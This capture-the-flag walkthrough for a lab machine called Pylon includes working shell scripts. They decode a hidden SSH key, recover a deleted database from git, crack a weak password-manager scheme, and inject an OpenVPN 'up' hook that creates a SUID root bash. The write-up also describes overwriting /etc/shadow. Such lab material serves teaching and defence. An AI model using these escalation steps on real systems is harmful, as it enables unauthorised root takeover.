Pylon CTF

The document details the process of solving a capture the flag scenario. Key steps include: 1. Analyzing files extracted from an initial image, including decoding base64 and gzip files to obtain an SSH key. 2. Using the key to connect to a server on port 222 and cracking a password to reveal flags and access another user account. 3. Investigating git history and decrypting database files to gain more passwords. 4. Editing an OpenVPN config file to run a script with root privileges and escalating access on the system. 5. Decrypting further files after obtaining root shell access.

Uploaded by AleNoAutoPlz

- We enter the room and download the file provided, pepper.jpg.

- Running exiftool on the file, we are provided with a link.

- Visiting the link takes us to CyberChef with a recipe already in place.


- Further analysis of the image reveals a file embedded with steghide.
- With either a brute-force run using rockyou, or just by guessing, you can extract the embedded file, 'lone'.

- Checking the file type with 'file' reveals ASCII text.

- The file contains what appears to be base64-encoded content.

- Decoding the file gives what appears to be a gzip file, possibly a tar archive; unpacking it yields an SSH private key.

- This SSH key is unencrypted and will allow us to connect to the machine.
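The decode chain above, written out as an added example (not the writeup's own commands): it unwraps base64, checks the gzip and tar magic bytes at each stage instead of guessing from 'file', and then classifies the key as usable without a passphrase or not. The blob is constructed inside the script and the key in it is a placeholder, not a real private key; the file names stage1/stage2/id_rsa are assumptions.

```shell
# Added example, not the writeup's own commands: unwrap the base64 -> gzip -> tar
# chain that hid the SSH key, checking magic bytes at each stage rather than
# guessing from 'file', then classify the key. The blob is constructed inside
# this script and the key in it is a placeholder, not a real private key.
set -euo pipefail

# magic_hex FILE N -> first N bytes of FILE as lowercase hex
magic_hex() { head -c "$2" "$1" | od -An -tx1 | tr -d ' \n'; }

# unwrap_blob BLOB OUTDIR -> extracts into OUTDIR and lists the archive members
unwrap_blob() {
    local blob="$1" out="$2"
    mkdir -p "$out"
    base64 -d "$blob" > "$out/stage1"          # 'file' called it ASCII text: it is base64
    [ "$(magic_hex "$out/stage1" 2)" = "1f8b" ] || { echo "stage1 is not gzip" >&2; return 1; }
    gunzip -c "$out/stage1" > "$out/stage2"
    # a tar header carries "ustar" at offset 257; check it before assuming an archive
    if [ "$(dd if="$out/stage2" bs=1 skip=257 count=5 2>/dev/null)" = "ustar" ]; then
        tar -xf "$out/stage2" -C "$out"
        tar -tf "$out/stage2"
    else
        echo "stage2 is not a tar archive; inspect $out/stage2 by hand" >&2
        return 1
    fi
}

# key_status FILE -> unencrypted | encrypted | unknown
key_status() {
    local f="$1"
    grep -q -- '-----BEGIN .*PRIVATE KEY-----' "$f" || { echo unknown; return; }
    # classic PEM marks a passphrase-protected key with a Proc-Type header
    grep -q '^Proc-Type: 4,ENCRYPTED' "$f" && { echo encrypted; return; }
    # the OpenSSH format keeps the cipher name inside the base64, so ask ssh-keygen
    if grep -q -- '-----BEGIN OPENSSH PRIVATE KEY-----' "$f" && command -v ssh-keygen >/dev/null; then
        if ssh-keygen -y -P '' -f "$f" >/dev/null 2>&1; then echo unencrypted; else echo encrypted; fi
        return
    fi
    echo unencrypted
}

# build_sample DIR -> DIR/lone, a constructed stand-in for the steghide output
build_sample() {
    mkdir -p "$1/src"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'PLACEHOLDER-NOT-A-REAL-KEY' \
        '-----END RSA PRIVATE KEY-----' > "$1/src/id_rsa"
    tar -czf "$1/lone.tgz" -C "$1/src" id_rsa
    base64 "$1/lone.tgz" > "$1/lone"
}

# demo -> key status for the constructed sample
demo() {
    local d; d="$(mktemp -d)"
    build_sample "$d"
    unwrap_blob "$d/lone" "$d/out" >/dev/null
    key_status "$d/out/id_rsa"
    rm -rf "$d"
}
demo
```

Once the key is out, the connection is the usual `chmod 600 id_rsa && ssh -i id_rsa -p 222 USER@TARGET` (USER and TARGET are placeholders; the writeup does not name the account).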
- Next, a port scan with rustscan reveals the following TCP ports open.
- Ports 22 and 222 both appear to be running OpenSSH, so let's try to connect to them.

- That's a no-go on port 22, so let's try 222.

- We are presented with this screen


- This is where the CyberChef recipe will probably come into play.
- If you are good at guessing, it will be the same password as the steghide file, so let's try that.

- We enter the encryption key and it gives us this screen.


- I try to escape to the shell, but cannot, other people may have more luck / expertise to do this.
- Selecting 1, we are given 2 options.

- We now have flag1 and a password, so let’s try those on port 22.

- Now we have user1.flag

- We also have a couple more interesting files and folders to look at: one is a file encrypted with gpg, the other is a folder with the sources for the password manager and a .git folder.

- Check the history.


- Nothing immediately obvious pops up in the pylon folder, so let's see if there are any files in a previous commit that may help us.
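The general form of that check, as an added example that is not part of the writeup: list every file a commit deleted anywhere in the history and pull it back from the parent of the deleting commit. The repository, file names and contents below are constructed for the demonstration.

```shell
# Added example, not from the writeup: find files deleted somewhere in a git
# history and restore them from the commit just before the deletion. The
# repository built here is constructed; pyLon_pwMan.py and pylon.db are the
# only names taken from the writeup, and their contents are placeholders.
set -euo pipefail

# list_deleted REPO -> lines "<commit> <path>" for every file removed by a commit
list_deleted() {
    local commit="" line
    git -C "$1" log --all --diff-filter=D --name-only --pretty=format:'commit %H' |
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            'commit '*) commit="${line#commit }" ;;
            '') ;;
            *) printf '%s %s\n' "$commit" "$line" ;;
        esac
    done
}

# restore_deleted REPO COMMIT PATH OUT -> PATH as it was in COMMIT's parent, written to OUT
restore_deleted() { git -C "$1" show "$2^:$3" > "$4"; }

# demo_recover -> the constructed pylon.db content recovered from history
demo_recover() {
    local repo out; repo="$(mktemp -d)"
    g() { git -C "$repo" -c user.name=ctf -c user.email=ctf@example.invalid -c init.defaultBranch=main "$@"; }
    g init -q
    printf 'placeholder source\n' > "$repo/pyLon_pwMan.py"
    printf 'sha512:deadbeef ct:0011\n' > "$repo/pylon.db"     # constructed stand-in for the .db
    g add -A && g commit -q -m 'initial version with db'
    g rm -q pylon.db && g commit -q -m 'remove database from repo'
    out="$(list_deleted "$repo")"                                # "<hash> pylon.db"
    restore_deleted "$repo" "${out%% *}" "${out#* }" "$repo/recovered.db"
    cat "$repo/recovered.db"
    rm -rf "$repo"
}
demo_recover
```

The same two commands work on a real clone: `list_deleted .` to find candidates, then `restore_deleted . <commit> <path> <out>`; `git log -p -- <path>` shows the file's full edit history if the interesting version is not the last one before deletion.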

- We can see that some files have changed here, and an interesting .db file appears.
- Running pyLon_pwMan.py with python3, the program informs us that the database file exists and prompts us for the encryption key; if you are a good guesser, you will try the same encryption key as before.

- This leads you to the passphrase for the gpg-encrypted file. If you are not a good guesser you will likely get stuck here and not progress: this older version uses a much weaker encryption method, XORing the stored password with the MD5 hash of the passphrase. Since there is only one password in the database, the remaining move would be to brute-force the SHA512 hash stored in the .db file to recover the passphrase, which would probably prove fruitless as it is a reasonably strong passphrase; I may be wrong, but I don't think it's feasible to do this.
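To make the weakness concrete, here is an added example (not the pyLon code) that models the scheme as the writeup describes it: the stored password XORed with MD5(passphrase), and SHA512(passphrase) kept in the .db for verification. It runs the dictionary attack the writeup considers and also shows a second route that needs no cracking at all. The .db layout, the hex encoding and the sample wordlist are assumptions.

```shell
# Added example, not the pyLon code: a model of the old pyLon_pwMan.py scheme as
# the writeup describes it (password XOR MD5(passphrase); SHA512(passphrase)
# stored in the .db). The .db layout, hex encoding and wordlist are assumptions.
set -euo pipefail

md5_hex()    { printf '%s' "$1" | md5sum    | cut -d' ' -f1; }
sha512_hex() { printf '%s' "$1" | sha512sum | cut -d' ' -f1; }
str_to_hex() { printf '%s' "$1" | od -An -tx1 | tr -d ' \n'; }
hex_to_str() { local h="$1" i; for ((i=0; i<${#h}; i+=2)); do printf "\\x${h:i:2}"; done; }

# xor_hex DATA_HEX KEY_HEX -> DATA xor KEY, KEY repeated as needed. A 16-byte MD5
# digest is therefore a keystream that wraps on every password longer than 16 bytes.
xor_hex() {
    local data="$1" key="$2" klen=${#2} out="" i
    for ((i=0; i<${#data}; i+=2)); do
        printf -v out '%s%02x' "$out" $(( 0x${data:i:2} ^ 0x${key:$((i % klen)):2} ))
    done
    printf '%s' "$out"
}

# the modelled scheme: PASSPHRASE PASSWORD -> CT_HEX, and back
encrypt_entry() { xor_hex "$(str_to_hex "$2")" "$(md5_hex "$1")"; }
decrypt_entry() { hex_to_str "$(xor_hex "$2" "$(md5_hex "$1")")"; }

# crack_passphrase SHA512_HEX WORDLIST -> the passphrase, or exit 1. This is the
# "brute-force the SHA512" route: one unsalted hash per candidate, no work factor,
# so only the passphrase's own strength limits it.
crack_passphrase() {
    local target="$1" w
    while IFS= read -r w || [ -n "$w" ]; do
        [ "$(sha512_hex "$w")" = "$target" ] && { printf '%s' "$w"; return 0; }
    done < "$2"
    return 1
}

# recover_keystream CT_HEX KNOWN_PLAINTEXT -> MD5(passphrase) as hex, without any
# cracking: 16 known bytes of any one entry reveal the whole keystream, which
# then decrypts every other entry encrypted under the same passphrase.
recover_keystream() {
    local plain_hex; plain_hex="$(str_to_hex "$2")"
    [ ${#plain_hex} -ge 32 ] || { echo "need at least 16 known bytes" >&2; return 1; }
    xor_hex "${1:0:32}" "${plain_hex:0:32}"
}

# demo_attack -> "<passphrase> <password>" recovered from a constructed database
demo_attack() {
    local wl db_hash ct pp
    wl="$(mktemp)"
    printf '%s\n' password 123456 hunter2 letmein > "$wl"   # constructed wordlist
    db_hash="$(sha512_hex hunter2)"                          # what the .db would store
    ct="$(encrypt_entry hunter2 'Secr3t-P@ss')"              # the single stored entry
    pp="$(crack_passphrase "$db_hash" "$wl")" || { rm -f "$wl"; return 1; }
    rm -f "$wl"
    printf '%s %s' "$pp" "$(decrypt_entry "$pp" "$ct")"
}
demo_attack; echo
```

The writeup's judgement that rockyou will not hit the real passphrase may well be right; the point of the model is that nothing else stands in the way. A password manager should derive its key with a slow KDF (argon2, scrypt, PBKDF2 with a high iteration count) and use an authenticated cipher, not an unsalted SHA512 check and an MD5-derived XOR pad.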

- Decrypting 'note_from_pood.gpg' gives us the password to move laterally to another user, but first let's see what lone can do with sudo.

- Interesting: we can run openvpn as root, but only with a specific config file. pood has asked us to fix the config and has given us access to his account, so let's switch to him.

- Now we have the user2 flag, and we can see that pood can edit the openvpn config file that lone is allowed to run, so what now?
- Reading the man page for openvpn, we see that it can run a script on successful connection to a VPN server (the 'up' directive, which needs 'script-security 2'), so let's write a script to take control of the machine.

- There are many ways to do this, but the usual trick of copying /bin/bash to /tmp and setting the SUID bit on the copy should do the job; I knock up a quick shell script.

- Don't forget to make it executable. Now we must edit the config file.

- Add a couple of lines to the config and save. Now exit the su shell, go back to lone, and connect to the openvpn server; our script should run as root on successful connection.

- The connection was successful, so let's disconnect and check out /tmp/bash.

- As expected, the binary was created, and we can now escalate to root.
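The escalation steps above, written out as an added example that is not the writeup's own script or config: the payload, the two config lines, and an audit that lists every directive in an OpenVPN config that makes it execute a program. That audit is what a defender (or pood, asked to "fix the config") would run over a config file that a sudo rule lets another user pass to openvpn. The paths /tmp/root.sh, /tmp/bash and the .ovpn file name are assumptions.

```shell
# Added example, not the writeup's own script or config: the OpenVPN hook abuse
# as (a) the payload, (b) the two config lines and (c) an audit that lists every
# directive in a .ovpn file that runs an external program. Paths are assumptions.
set -euo pipefail

# OpenVPN options that execute an external program. Each one is a root shell when
# the config is writable by a user who may run openvpn with it through sudo.
SCRIPT_DIRECTIVES='up|down|route-up|route-pre-down|ipchange|tls-verify|client-connect|client-disconnect|auth-user-pass-verify|learn-address'

# audit_ovpn_config FILE -> prints script-security and every script-executing directive
audit_ovpn_config() {
    grep -E "^[[:space:]]*(script-security|${SCRIPT_DIRECTIVES})([[:space:]]|$)" "$1" || true
}

# write_payload PATH -> the script the writeup describes: a SUID copy of bash in /tmp
write_payload() {
    cat > "$1" <<'EOF'
#!/bin/sh
# executed by openvpn as root once the tunnel is up
cp /bin/bash /tmp/bash
chmod 4755 /tmp/bash
EOF
    chmod +x "$1"
}

# inject_up_hook CONFIG SCRIPT -> the "couple of lines": allow scripts, run ours on 'up'
inject_up_hook() {
    printf '%s\n' 'script-security 2' "up $2" >> "$1"
}

# demo -> count of script-executing lines before and after injection, e.g. "0 2"
demo() {
    local d cfg before after
    d="$(mktemp -d)"; cfg="$d/pood.ovpn"
    # constructed client config with no hooks at all
    printf '%s\n' client 'dev tun' 'proto udp' 'remote vpn.example.invalid 1194' \
        'resolv-retry infinite' nobind persist-key persist-tun > "$cfg"
    before="$(audit_ovpn_config "$cfg" | grep -c . || true)"
    write_payload "$d/root.sh"
    inject_up_hook "$cfg" "$d/root.sh"
    after="$(audit_ovpn_config "$cfg" | grep -c . || true)"
    rm -rf "$d"
    printf '%s %s' "$before" "$after"
}
demo; echo
```

Two practical notes. Run the SUID copy as `/tmp/bash -p`: without -p, bash notices that the effective uid differs from the real uid and drops back to the real one. And even with -p you are root only by effective uid; the real uid and HOME are still lone's, which is the "only effectively root" situation the next step runs into.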


- Great, another gpg-encrypted file. I can see a lot of people tearing their hair out over this one; since we are only effectively root, we cannot decrypt his message, so we will need a proper shell.

- The way I dealt with that was to edit /etc/shadow: I copied a known hash into root's position, and then we can su to root. In this case I just copy-pasted pood's hash, as it is already known and easy to grab.

- Notice I also overwrote pylon's hash, just for fun; you can go this way too, because pylon is in the sudo group.

- One last thing to do.

- Hope you enjoyed the room, my first one; I have some other ideas up my sleeve, so stay tuned.
